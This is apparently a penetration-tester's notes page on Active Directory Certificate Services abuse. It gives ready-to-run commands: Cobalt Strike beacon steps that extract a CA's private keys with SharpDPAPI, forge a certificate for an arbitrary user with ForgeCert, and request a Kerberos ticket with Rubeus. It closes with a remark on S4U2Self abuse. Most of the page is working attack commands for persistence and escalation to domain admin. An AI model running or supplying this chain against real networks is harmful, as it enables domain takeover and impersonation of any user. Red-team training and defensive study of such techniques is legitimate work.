In many cases, AD CS roles may not be installed on the DCs, and domain admin is not needed to manage them. If a CA machine account is compromised, then certificates could be forged to maintain persistence and elevate to domain admins.

Use SharpDPAPI to enumerate CA private keys:

beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine

Save the keys into .pem and use openssl to convert to .pfx.

Create a forged certificate using ForgeCert.

C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\sub-ca.pfx --CaCertPassword [ca-cert-password] --Subject "CN=User" --SubjectAltName "[target-user]@[domain-fqdn]" --NewCertPath .\auth.pfx --NewCertPassword [auth-cert-password]

Request a TGT with certificate:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-user] /domain:[domain-fqdn] /enctype:aes256 /certificate:[cert-base64] /password:[cert-password] /nowrap

NOTE

It is also possible to create machine certificates and use S4U2Self abuse to access any domain-joined machine/service.